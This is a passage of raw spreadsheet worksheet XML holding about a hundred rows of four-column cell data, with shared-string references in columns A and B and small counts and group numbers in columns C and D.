      <c r="C11465">
        <v>0</v>
      </c>
      <c r="D11465">
        <v>4967</v>
      </c>
    </row>
    <row r="11466" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11466" t="s">
        <v>16228</v>
      </c>
      <c r="B11466" t="s">
        <v>16213</v>
      </c>
      <c r="C11466">
        <v>0</v>
      </c>
      <c r="D11466">
        <v>4967</v>
      </c>
    </row>
    <row r="11467" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11467" t="s">
        <v>16231</v>
      </c>
      <c r="B11467" t="s">
        <v>16214</v>
      </c>
      <c r="C11467">
        <v>0</v>
      </c>
      <c r="D11467">
        <v>4967</v>
      </c>
    </row>
    <row r="11468" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11468" t="s">
        <v>16228</v>
      </c>
      <c r="B11468" t="s">
        <v>16215</v>
      </c>
      <c r="C11468">
        <v>3</v>
      </c>
      <c r="D11468">
        <v>4967</v>
      </c>
    </row>
    <row r="11469" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11469" t="s">
        <v>16231</v>
      </c>
      <c r="B11469" t="s">
        <v>16216</v>
      </c>
      <c r="C11469">
        <v>1</v>
      </c>
      <c r="D11469">
        <v>4967</v>
      </c>
    </row>
    <row r="11470" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11470" t="s">
        <v>16228</v>
      </c>
      <c r="B11470" t="s">
        <v>16217</v>
      </c>
      <c r="C11470">
        <v>0</v>
      </c>
      <c r="D11470">
        <v>4967</v>
      </c>
    </row>
    <row r="11471" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11471" t="s">
        <v>16231</v>
      </c>
      <c r="B11471" t="s">
        <v>16218</v>
      </c>
      <c r="C11471">
        <v>0</v>
      </c>
      <c r="D11471">
        <v>4967</v>
      </c>
    </row>
    <row r="11472" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11472" t="s">
        <v>16229</v>
      </c>
      <c r="B11472" t="s">
        <v>16219</v>
      </c>
      <c r="C11472">
        <v>4</v>
      </c>
      <c r="D11472">
        <v>4967</v>
      </c>
    </row>
    <row r="11473" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11473" t="s">
        <v>16230</v>
      </c>
      <c r="B11473" t="s">
        <v>16220</v>
      </c>
      <c r="C11473">
        <v>4</v>
      </c>
      <c r="D11473">
        <v>4967</v>
      </c>
    </row>
    <row r="11474" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11474" t="s">
        <v>16229</v>
      </c>
      <c r="B11474" t="s">
        <v>16221</v>
      </c>
      <c r="C11474">
        <v>0</v>
      </c>
      <c r="D11474">
        <v>4967</v>
      </c>
    </row>
    <row r="11475" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11475" t="s">
        <v>16230</v>
      </c>
      <c r="B11475" t="s">
        <v>16222</v>
      </c>
      <c r="C11475">
        <v>0</v>
      </c>
      <c r="D11475">
        <v>4967</v>
      </c>
    </row>
    <row r="11476" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11476" t="s">
        <v>16223</v>
      </c>
      <c r="B11476" t="s">
        <v>16223</v>
      </c>
      <c r="C11476">
        <v>24</v>
      </c>
      <c r="D11476">
        <v>4967</v>
      </c>
    </row>
    <row r="11477" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11477" t="s">
        <v>16224</v>
      </c>
      <c r="B11477" t="s">
        <v>16224</v>
      </c>
      <c r="C11477">
        <v>1</v>
      </c>
      <c r="D11477">
        <v>4967</v>
      </c>
    </row>
    <row r="11478" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11478" t="s">
        <v>16228</v>
      </c>
      <c r="B11478" t="s">
        <v>16211</v>
      </c>
      <c r="C11478">
        <v>0</v>
      </c>
      <c r="D11478">
        <v>4880</v>
      </c>
    </row>
    <row r="11479" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11479" t="s">
        <v>16231</v>
      </c>
      <c r="B11479" t="s">
        <v>16212</v>
      </c>
      <c r="C11479">
        <v>0</v>
      </c>
      <c r="D11479">
        <v>4880</v>
      </c>
    </row>
    <row r="11480" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11480" t="s">
        <v>16228</v>
      </c>
      <c r="B11480" t="s">
        <v>16213</v>
      </c>
      <c r="C11480">
        <v>0</v>
      </c>
      <c r="D11480">
        <v>4880</v>
      </c>
    </row>
    <row r="11481" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11481" t="s">
        <v>16231</v>
      </c>
      <c r="B11481" t="s">
        <v>16214</v>
      </c>
      <c r="C11481">
        <v>0</v>
      </c>
      <c r="D11481">
        <v>4880</v>
      </c>
    </row>
    <row r="11482" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11482" t="s">
        <v>16228</v>
      </c>
      <c r="B11482" t="s">
        <v>16215</v>
      </c>
      <c r="C11482">
        <v>0</v>
      </c>
      <c r="D11482">
        <v>4880</v>
      </c>
    </row>
    <row r="11483" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11483" t="s">
        <v>16231</v>
      </c>
      <c r="B11483" t="s">
        <v>16216</v>
      </c>
      <c r="C11483">
        <v>1</v>
      </c>
      <c r="D11483">
        <v>4880</v>
      </c>
    </row>
    <row r="11484" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11484" t="s">
        <v>16228</v>
      </c>
      <c r="B11484" t="s">
        <v>16217</v>
      </c>
      <c r="C11484">
        <v>1</v>
      </c>
      <c r="D11484">
        <v>4880</v>
      </c>
    </row>
    <row r="11485" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11485" t="s">
        <v>16231</v>
      </c>
      <c r="B11485" t="s">
        <v>16218</v>
      </c>
      <c r="C11485">
        <v>0</v>
      </c>
      <c r="D11485">
        <v>4880</v>
      </c>
    </row>
    <row r="11486" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11486" t="s">
        <v>16229</v>
      </c>
      <c r="B11486" t="s">
        <v>16219</v>
      </c>
      <c r="C11486">
        <v>0</v>
      </c>
      <c r="D11486">
        <v>4880</v>
      </c>
    </row>
    <row r="11487" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11487" t="s">
        <v>16230</v>
      </c>
      <c r="B11487" t="s">
        <v>16220</v>
      </c>
      <c r="C11487">
        <v>0</v>
      </c>
      <c r="D11487">
        <v>4880</v>
      </c>
    </row>
    <row r="11488" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11488" t="s">
        <v>16229</v>
      </c>
      <c r="B11488" t="s">
        <v>16221</v>
      </c>
      <c r="C11488">
        <v>0</v>
      </c>
      <c r="D11488">
        <v>4880</v>
      </c>
    </row>
    <row r="11489" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11489" t="s">
        <v>16230</v>
      </c>
      <c r="B11489" t="s">
        <v>16222</v>
      </c>
      <c r="C11489">
        <v>0</v>
      </c>
      <c r="D11489">
        <v>4880</v>
      </c>
    </row>
    <row r="11490" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11490" t="s">
        <v>16223</v>
      </c>
      <c r="B11490" t="s">
        <v>16223</v>
      </c>
      <c r="C11490">
        <v>6</v>
      </c>
      <c r="D11490">
        <v>4880</v>
      </c>
    </row>
    <row r="11491" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11491" t="s">
        <v>16224</v>
      </c>
      <c r="B11491" t="s">
        <v>16224</v>
      </c>
      <c r="C11491">
        <v>1</v>
      </c>
      <c r="D11491">
        <v>4880</v>
      </c>
    </row>
    <row r="11492" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11492" t="s">
        <v>16228</v>
      </c>
      <c r="B11492" t="s">
        <v>16211</v>
      </c>
      <c r="C11492">
        <v>0</v>
      </c>
      <c r="D11492">
        <v>506</v>
      </c>
    </row>
    <row r="11493" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11493" t="s">
        <v>16231</v>
      </c>
      <c r="B11493" t="s">
        <v>16212</v>
      </c>
      <c r="C11493">
        <v>0</v>
      </c>
      <c r="D11493">
        <v>506</v>
      </c>
    </row>
    <row r="11494" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11494" t="s">
        <v>16228</v>
      </c>
      <c r="B11494" t="s">
        <v>16213</v>
      </c>
      <c r="C11494">
        <v>0</v>
      </c>
      <c r="D11494">
        <v>506</v>
      </c>
    </row>
    <row r="11495" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11495" t="s">
        <v>16231</v>
      </c>
      <c r="B11495" t="s">
        <v>16214</v>
      </c>
      <c r="C11495">
        <v>0</v>
      </c>
      <c r="D11495">
        <v>506</v>
      </c>
    </row>
    <row r="11496" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11496" t="s">
        <v>16228</v>
      </c>
      <c r="B11496" t="s">
        <v>16215</v>
      </c>
      <c r="C11496">
        <v>10</v>
      </c>
      <c r="D11496">
        <v>506</v>
      </c>
    </row>
    <row r="11497" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11497" t="s">
        <v>16231</v>
      </c>
      <c r="B11497" t="s">
        <v>16216</v>
      </c>
      <c r="C11497">
        <v>29</v>
      </c>
      <c r="D11497">
        <v>506</v>
      </c>
    </row>
    <row r="11498" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11498" t="s">
        <v>16228</v>
      </c>
      <c r="B11498" t="s">
        <v>16217</v>
      </c>
      <c r="C11498">
        <v>60</v>
      </c>
      <c r="D11498">
        <v>506</v>
      </c>
    </row>
    <row r="11499" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11499" t="s">
        <v>16231</v>
      </c>
      <c r="B11499" t="s">
        <v>16218</v>
      </c>
      <c r="C11499">
        <v>56</v>
      </c>
      <c r="D11499">
        <v>506</v>
      </c>
    </row>
    <row r="11500" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11500" t="s">
        <v>16229</v>
      </c>
      <c r="B11500" t="s">
        <v>16219</v>
      </c>
      <c r="C11500">
        <v>1</v>
      </c>
      <c r="D11500">
        <v>506</v>
      </c>
    </row>
    <row r="11501" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11501" t="s">
        <v>16230</v>
      </c>
      <c r="B11501" t="s">
        <v>16220</v>
      </c>
      <c r="C11501">
        <v>4</v>
      </c>
      <c r="D11501">
        <v>506</v>
      </c>
    </row>
    <row r="11502" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11502" t="s">
        <v>16229</v>
      </c>
      <c r="B11502" t="s">
        <v>16221</v>
      </c>
      <c r="C11502">
        <v>4</v>
      </c>
      <c r="D11502">
        <v>506</v>
      </c>
    </row>
    <row r="11503" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11503" t="s">
        <v>16230</v>
      </c>
      <c r="B11503" t="s">
        <v>16222</v>
      </c>
      <c r="C11503">
        <v>1</v>
      </c>
      <c r="D11503">
        <v>506</v>
      </c>
    </row>
    <row r="11504" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11504" t="s">
        <v>16223</v>
      </c>
      <c r="B11504" t="s">
        <v>16223</v>
      </c>
      <c r="C11504">
        <v>25</v>
      </c>
      <c r="D11504">
        <v>506</v>
      </c>
    </row>
    <row r="11505" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11505" t="s">
        <v>16224</v>
      </c>
      <c r="B11505" t="s">
        <v>16224</v>
      </c>
      <c r="C11505">
        <v>3</v>
      </c>
      <c r="D11505">
        <v>506</v>
      </c>
    </row>
    <row r="11506" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11506" t="s">
        <v>16223</v>
      </c>
      <c r="B11506" t="s">
        <v>16223</v>
      </c>
      <c r="C11506">
        <v>1</v>
      </c>
      <c r="D11506">
        <v>57</v>
      </c>
    </row>
    <row r="11507" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11507" t="s">
        <v>16228</v>
      </c>
      <c r="B11507" t="s">
        <v>16211</v>
      </c>
      <c r="C11507">
        <v>0</v>
      </c>
      <c r="D11507">
        <v>1265</v>
      </c>
    </row>
    <row r="11508" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11508" t="s">
        <v>16231</v>
      </c>
      <c r="B11508" t="s">
        <v>16212</v>
      </c>
      <c r="C11508">
        <v>0</v>
      </c>
      <c r="D11508">
        <v>1265</v>
      </c>
    </row>
    <row r="11509" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11509" t="s">
        <v>16228</v>
      </c>
      <c r="B11509" t="s">
        <v>16213</v>
      </c>
      <c r="C11509">
        <v>0</v>
      </c>
      <c r="D11509">
        <v>1265</v>
      </c>
    </row>
    <row r="11510" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11510" t="s">
        <v>16231</v>
      </c>
      <c r="B11510" t="s">
        <v>16214</v>
      </c>
      <c r="C11510">
        <v>0</v>
      </c>
      <c r="D11510">
        <v>1265</v>
      </c>
    </row>
    <row r="11511" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11511" t="s">
        <v>16228</v>
      </c>
      <c r="B11511" t="s">
        <v>16215</v>
      </c>
      <c r="C11511">
        <v>9</v>
      </c>
      <c r="D11511">
        <v>1265</v>
      </c>
    </row>
    <row r="11512" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11512" t="s">
        <v>16231</v>
      </c>
      <c r="B11512" t="s">
        <v>16216</v>
      </c>
      <c r="C11512">
        <v>10</v>
      </c>
      <c r="D11512">
        <v>1265</v>
      </c>
    </row>
    <row r="11513" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11513" t="s">
        <v>16228</v>
      </c>
      <c r="B11513" t="s">
        <v>16217</v>
      </c>
      <c r="C11513">
        <v>20</v>
      </c>
      <c r="D11513">
        <v>1265</v>
      </c>
    </row>
    <row r="11514" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11514" t="s">
        <v>16231</v>
      </c>
      <c r="B11514" t="s">
        <v>16218</v>
      </c>
      <c r="C11514">
        <v>12</v>
      </c>
      <c r="D11514">
        <v>1265</v>
      </c>
    </row>
    <row r="11515" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11515" t="s">
        <v>16229</v>
      </c>
      <c r="B11515" t="s">
        <v>16219</v>
      </c>
      <c r="C11515">
        <v>4</v>
      </c>
      <c r="D11515">
        <v>1265</v>
      </c>
    </row>
    <row r="11516" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11516" t="s">
        <v>16230</v>
      </c>
      <c r="B11516" t="s">
        <v>16220</v>
      </c>
      <c r="C11516">
        <v>5</v>
      </c>
      <c r="D11516">
        <v>1265</v>
      </c>
    </row>
    <row r="11517" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11517" t="s">
        <v>16229</v>
      </c>
      <c r="B11517" t="s">
        <v>16221</v>
      </c>
      <c r="C11517">
        <v>241</v>
      </c>
      <c r="D11517">
        <v>1265</v>
      </c>
    </row>
    <row r="11518" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11518" t="s">
        <v>16230</v>
      </c>
      <c r="B11518" t="s">
        <v>16222</v>
      </c>
      <c r="C11518">
        <v>438</v>
      </c>
      <c r="D11518">
        <v>1265</v>
      </c>
    </row>
    <row r="11519" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11519" t="s">
        <v>16223</v>
      </c>
      <c r="B11519" t="s">
        <v>16223</v>
      </c>
      <c r="C11519">
        <v>24</v>
      </c>
      <c r="D11519">
        <v>1265</v>
      </c>
    </row>
    <row r="11520" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11520" t="s">
        <v>16224</v>
      </c>
      <c r="B11520" t="s">
        <v>16224</v>
      </c>
      <c r="C11520">
        <v>1</v>
      </c>
      <c r="D11520">
        <v>1265</v>
      </c>
    </row>
    <row r="11521" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11521" t="s">
        <v>16230</v>
      </c>
      <c r="B11521" t="s">
        <v>16222</v>
      </c>
      <c r="C11521">
        <v>432</v>
      </c>
      <c r="D11521">
        <v>1265</v>
      </c>
    </row>
    <row r="11522" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11522" t="s">
        <v>16230</v>
      </c>
      <c r="B11522" t="s">
        <v>16220</v>
      </c>
      <c r="C11522">
        <v>0</v>
      </c>
      <c r="D11522">
        <v>57</v>
      </c>
    </row>
    <row r="11523" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11523" t="s">
        <v>16230</v>
      </c>
      <c r="B11523" t="s">
        <v>16222</v>
      </c>
      <c r="C11523">
        <v>1</v>
      </c>
      <c r="D11523">
        <v>57</v>
      </c>
    </row>
    <row r="11524" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11524" t="s">
        <v>16224</v>
      </c>
      <c r="B11524" t="s">
        <v>16224</v>
      </c>
      <c r="C11524">
        <v>1</v>
      </c>
      <c r="D11524">
        <v>57</v>
      </c>
    </row>
    <row r="11525" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11525" t="s">
        <v>16228</v>
      </c>
      <c r="B11525" t="s">
        <v>16211</v>
      </c>
      <c r="C11525">
        <v>0</v>
      </c>
      <c r="D11525">
        <v>1216</v>
      </c>
    </row>
    <row r="11526" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11526" t="s">
        <v>16231</v>
      </c>
      <c r="B11526" t="s">
        <v>16212</v>
      </c>
      <c r="C11526">
        <v>0</v>
      </c>
      <c r="D11526">
        <v>1216</v>
      </c>
    </row>
    <row r="11527" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11527" t="s">
        <v>16228</v>
      </c>
      <c r="B11527" t="s">
        <v>16213</v>
      </c>
      <c r="C11527">
        <v>0</v>
      </c>
      <c r="D11527">
        <v>1216</v>
      </c>
    </row>
    <row r="11528" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11528" t="s">
        <v>16231</v>
      </c>
      <c r="B11528" t="s">
        <v>16214</v>
      </c>
      <c r="C11528">
        <v>0</v>
      </c>
      <c r="D11528">
        <v>1216</v>
      </c>
    </row>
    <row r="11529" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11529" t="s">
        <v>16228</v>
      </c>
      <c r="B11529" t="s">
        <v>16215</v>
      </c>
      <c r="C11529">
        <v>24</v>
      </c>
      <c r="D11529">
        <v>1216</v>
      </c>
    </row>
    <row r="11530" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11530" t="s">
        <v>16231</v>
      </c>
      <c r="B11530" t="s">
        <v>16216</v>
      </c>
      <c r="C11530">
        <v>43</v>
      </c>
      <c r="D11530">
        <v>1216</v>
      </c>
    </row>
    <row r="11531" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11531" t="s">
        <v>16228</v>
      </c>
      <c r="B11531" t="s">
        <v>16217</v>
      </c>
      <c r="C11531">
        <v>62</v>
      </c>
      <c r="D11531">
        <v>1216</v>
      </c>
    </row>
    <row r="11532" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11532" t="s">
        <v>16231</v>
      </c>
      <c r="B11532" t="s">
        <v>16218</v>
      </c>
      <c r="C11532">
        <v>0</v>
      </c>
      <c r="D11532">
        <v>1216</v>
      </c>
    </row>
    <row r="11533" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11533" t="s">
        <v>16229</v>
      </c>
      <c r="B11533" t="s">
        <v>16219</v>
      </c>
      <c r="C11533">
        <v>0</v>
      </c>
      <c r="D11533">
        <v>1216</v>
      </c>
    </row>
    <row r="11534" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11534" t="s">
        <v>16230</v>
      </c>
      <c r="B11534" t="s">
        <v>16220</v>
      </c>
      <c r="C11534">
        <v>0</v>
      </c>
      <c r="D11534">
        <v>1216</v>
      </c>
    </row>
    <row r="11535" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11535" t="s">
        <v>16229</v>
      </c>
      <c r="B11535" t="s">
        <v>16221</v>
      </c>
      <c r="C11535">
        <v>10</v>
      </c>
      <c r="D11535">
        <v>1216</v>
      </c>
    </row>
    <row r="11536" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11536" t="s">
        <v>16230</v>
      </c>
      <c r="B11536" t="s">
        <v>16222</v>
      </c>
      <c r="C11536">
        <v>0</v>
      </c>
      <c r="D11536">
        <v>1216</v>
      </c>
    </row>
    <row r="11537" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11537" t="s">
        <v>16223</v>
      </c>
      <c r="B11537" t="s">
        <v>16223</v>
      </c>
      <c r="C11537">
        <v>21</v>
      </c>
      <c r="D11537">
        <v>1216</v>
      </c>
    </row>
    <row r="11538" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11538" t="s">
        <v>16224</v>
      </c>
      <c r="B11538" t="s">
        <v>16224</v>
      </c>
      <c r="C11538">
        <v>1</v>
      </c>
      <c r="D11538">
        <v>1216</v>
      </c>
    </row>
    <row r="11539" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11539" t="s">
        <v>16228</v>
      </c>
      <c r="B11539" t="s">
        <v>16211</v>
      </c>
      <c r="C11539">
        <v>0</v>
      </c>
      <c r="D11539">
        <v>1192</v>
      </c>
    </row>
    <row r="11540" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11540" t="s">
        <v>16231</v>
      </c>
      <c r="B11540" t="s">
        <v>16212</v>
      </c>
      <c r="C11540">
        <v>0</v>
      </c>
      <c r="D11540">
        <v>1192</v>
      </c>
    </row>
    <row r="11541" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11541" t="s">
        <v>16228</v>
      </c>
      <c r="B11541" t="s">
        <v>16213</v>
      </c>
      <c r="C11541">
        <v>0</v>
      </c>
      <c r="D11541">
        <v>1192</v>
      </c>
    </row>
    <row r="11542" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11542" t="s">
        <v>16231</v>
      </c>
      <c r="B11542" t="s">
        <v>16214</v>
      </c>
      <c r="C11542">
        <v>0</v>
      </c>
      <c r="D11542">
        <v>1192</v>
      </c>
    </row>
    <row r="11543" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11543" t="s">
        <v>16228</v>
      </c>
      <c r="B11543" t="s">
        <v>16215</v>
      </c>
      <c r="C11543">
        <v>1</v>
      </c>
      <c r="D11543">
        <v>1192</v>
      </c>
    </row>
    <row r="11544" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11544" t="s">
        <v>16231</v>
      </c>
      <c r="B11544" t="s">
        <v>16216</v>
      </c>
      <c r="C11544">
        <v>4</v>
      </c>
      <c r="D11544">
        <v>1192</v>
      </c>
    </row>
    <row r="11545" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11545" t="s">
        <v>16228</v>
      </c>
      <c r="B11545" t="s">
        <v>16217</v>
      </c>
      <c r="C11545">
        <v>8</v>
      </c>
      <c r="D11545">
        <v>1192</v>
      </c>
    </row>
    <row r="11546" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11546" t="s">
        <v>16231</v>
      </c>
      <c r="B11546" t="s">
        <v>16218</v>
      </c>
      <c r="C11546">
        <v>0</v>
      </c>
      <c r="D11546">
        <v>1192</v>
      </c>
    </row>
    <row r="11547" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11547" t="s">
        <v>16229</v>
      </c>
      <c r="B11547" t="s">
        <v>16219</v>
      </c>
      <c r="C11547">
        <v>0</v>
      </c>
      <c r="D11547">
        <v>1192</v>
      </c>
    </row>
    <row r="11548" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11548" t="s">
        <v>16230</v>
      </c>
      <c r="B11548" t="s">
        <v>16220</v>
      </c>
      <c r="C11548">
        <v>0</v>
      </c>
      <c r="D11548">
        <v>1192</v>
      </c>
    </row>
    <row r="11549" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11549" t="s">
        <v>16229</v>
      </c>
      <c r="B11549" t="s">
        <v>16221</v>
      </c>
      <c r="C11549">
        <v>8</v>
      </c>
      <c r="D11549">
        <v>1192</v>
      </c>
    </row>
    <row r="11550" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11550" t="s">
        <v>16230</v>
      </c>
      <c r="B11550" t="s">
        <v>16222</v>
      </c>
      <c r="C11550">
        <v>7</v>
      </c>
      <c r="D11550">
        <v>1192</v>
      </c>
    </row>
    <row r="11551" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11551" t="s">
        <v>16223</v>
      </c>
      <c r="B11551" t="s">
        <v>16223</v>
      </c>
      <c r="C11551">
        <v>26</v>
      </c>
      <c r="D11551">
        <v>1192</v>
      </c>
    </row>
    <row r="11552" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11552" t="s">
        <v>16224</v>
      </c>
      <c r="B11552" t="s">
        <v>16224</v>
      </c>
      <c r="C11552">
        <v>0</v>
      </c>
      <c r="D11552">
        <v>1192</v>
      </c>
    </row>
    <row r="11553" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11553" t="s">
        <v>16228</v>
      </c>
      <c r="B11553" t="s">
        <v>16211</v>
      </c>
      <c r="C11553">
        <v>0</v>
      </c>
      <c r="D11553">
        <v>1142</v>
      </c>
    </row>
    <row r="11554" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11554" t="s">
        <v>16231</v>
      </c>
      <c r="B11554" t="s">
        <v>16212</v>
      </c>
      <c r="C11554">
        <v>0</v>
      </c>
      <c r="D11554">
        <v>1142</v>
      </c>
    </row>
    <row r="11555" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11555" t="s">
        <v>16228</v>
      </c>
      <c r="B11555" t="s">
        <v>16213</v>
      </c>
      <c r="C11555">
        <v>1</v>
      </c>
      <c r="D11555">
        <v>1142</v>
      </c>
    </row>
    <row r="11556" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11556" t="s">
        <v>16231</v>
      </c>
      <c r="B11556" t="s">
        <v>16214</v>
      </c>
      <c r="C11556">
        <v>0</v>
      </c>
      <c r="D11556">
        <v>1142</v>
      </c>
    </row>
    <row r="11557" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11557" t="s">
        <v>16228</v>
      </c>
      <c r="B11557" t="s">
        <v>16215</v>
      </c>
      <c r="C11557">
        <v>0</v>
      </c>
      <c r="D11557">
        <v>1142</v>
      </c>
    </row>
    <row r="11558" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11558" t="s">
        <v>16231</v>
      </c>
      <c r="B11558" t="s">
        <v>16216</v>
      </c>
      <c r="C11558">
        <v>4</v>
      </c>
      <c r="D11558">
        <v>1142</v>
      </c>
    </row>
    <row r="11559" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11559" t="s">
        <v>16228</v>
      </c>
      <c r="B11559" t="s">
        <v>16217</v>
      </c>
      <c r="C11559">
        <v>0</v>
      </c>
      <c r="D11559">
        <v>1142</v>
      </c>
    </row>
    <row r="11560" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11560" t="s">
        <v>16231</v>
      </c>
      <c r="B11560" t="s">
        <v>16218</v>
      </c>
      <c r="C11560">
        <v>1</v>
      </c>
      <c r="D11560">
        <v>1142</v>
      </c>
    </row>
    <row r="11561" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11561" t="s">
        <v>16229</v>
      </c>
      <c r="B11561" t="s">
        <v>16219</v>
      </c>
      <c r="C11561">
        <v>0</v>
      </c>
      <c r="D11561">
        <v>1142</v>
      </c>
    </row>
    <row r="11562" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11562" t="s">
        <v>16230</v>
      </c>
      <c r="B11562" t="s">
        <v>16220</v>
      </c>
      <c r="C11562">
        <v>0</v>
      </c>
      <c r="D11562">
        <v>1142</v>
      </c>
    </row>
    <row r="11563" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11563" t="s">
        <v>16229</v>
      </c>
      <c r="B11563" t="s">
        <v>16221</v>
      </c>
      <c r="C11563">
        <v>8</v>
      </c>
      <c r="D11563">
        <v>1142</v>
      </c>
    </row>
    <row r="11564" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11564" t="s">
        <v>16230</v>
      </c>
      <c r="B11564" t="s">
        <v>16222</v>
      </c>
      <c r="C11564">
        <v>8</v>
      </c>
      <c r="D11564">
        <v>1142</v>
      </c>
    </row>
    <row r="11565" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11565" t="s">
        <v>16223</v>
      </c>
      <c r="B11565" t="s">
        <v>16223</v>
      </c>
      <c r="C11565">
        <v>6</v>
      </c>
      <c r="D11565">
        <v>1142</v>
      </c>
    </row>
    <row r="11566" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11566" t="s">
        <v>16224</v>
      </c>
      <c r="B11566" t="s">
        <v>16224</v>
      </c>
      <c r="C11566">
        <v>0</v>
      </c>
      <c r="D11566">
        <v>1142</v>
      </c>
    </row>
    <row r="11567" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11567" t="s">
        <v>16228</v>
      </c>
      <c r="B11567" t="s">
        <v>16211</v>
      </c>
      <c r="C11567">
        <v>0</v>
      </c>
      <c r="D11567">
        <v>1618</v>
      </c>
    </row>
    <row r="11568" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11568" t="s">
        <v>16231</v>
      </c>
      <c r="B11568" t="s">
        <v>16212</v>
      </c>
      <c r="C11568">
        <v>0</v>
      </c>
      <c r="D11568">
        <v>1618</v>
      </c>
    </row>
    <row r="11569" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11569" t="s">
        <v>16228</v>
      </c>
      <c r="B11569" t="s">
        <v>16213</v>
      </c>
      <c r="C11569">
        <v>0</v>
      </c>
      <c r="D11569">
        <v>1618</v>
      </c>
    </row>
    <row r="11570" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11570" t="s">
        <v>16231</v>
      </c>
      <c r="B11570" t="s">
        <v>16214</v>
      </c>
